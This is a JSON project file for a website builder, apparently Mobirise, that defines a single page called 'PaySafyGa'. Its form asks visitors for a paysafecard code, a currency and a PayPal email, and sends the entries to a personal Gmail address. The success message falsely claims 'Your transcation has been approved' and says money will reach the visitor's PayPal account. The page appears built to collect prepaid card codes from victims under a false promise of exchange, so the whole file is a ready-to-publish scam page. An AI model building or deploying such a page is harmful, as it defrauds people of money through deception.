{
  "settings": {
    "name": "Site-03-17_1248",
    "currentPage": "index.html",
    "theme": {
      "name": "purity",
      "title": "PurityM",
      "styling": {},
      "additionalSetColors": []
    },
    "path": "@PROJECT_PATH@",
    "versionFirst": "4.9.6",
    "siteFonts": [],
    "uniqCompNum": 1,
    "versionPublish": "4.9.6"
  },
  "pages": {
    "index.html": {
      "settings": {
        "main": true,
        "title": "Home",
        "meta_descr": "",
        "header_custom": "",
        "footer_custom": "",
        "html_before": ""
      },
      "components": [
        {
          "_params": {
            "showTitle": true,
            "paddingTop": 3,
            "paddingBottom": 3,
            "bgImageRadio": false,
            "bgImage": "@THEME_PATH@/components/_images/photo-3.jpg",
            "parallax": true,
            "bgColorRadio": true,
            "bgColor": "#5bc0de",
            "overlay": false,
            "overlayColor": "#222",
            "overlayOpacity": 0.5
          },
          "title": "PaySafyGa",
          "buttons": "<a data-app-btn=\"true\" type=\"submit\" class=\"btn btn-secondary-outline\" data-toolbar=\"-mbrLink,-mbrBtnAdd,-mbrBtnMove\">EXCHANGE NOW</a>",
          "form": {
            "action": "neagaseby@gmail.com",
            "alerts": {
              "success": "Your transcation has been approved! Your money will soon reach your PayPal Account."
            },
            "fields": {
              "name": {
                "visible": true,
                "title": "Name",
                "customTitle": "PAYSAFECARD CODE*"
              },
              "email": {
                "visible": true,
                "title": "Email",
                "customTitle": "CURRENCY*"
              },
              "phone": {
                "visible": true,
                "title": "Phone",
                "customTitle": "PAYPAL EMAIL ADDRESS*"
              },
              "message": {
                "title": "Message",
                "customTitle": ""
              }
            }
          },
          "alias": "purity/components",
          "_tags": [
            "Theme"
          ],
          "_name": "form1",
          "_anchor": "form1-0"
        }
      ]
    }
  }
}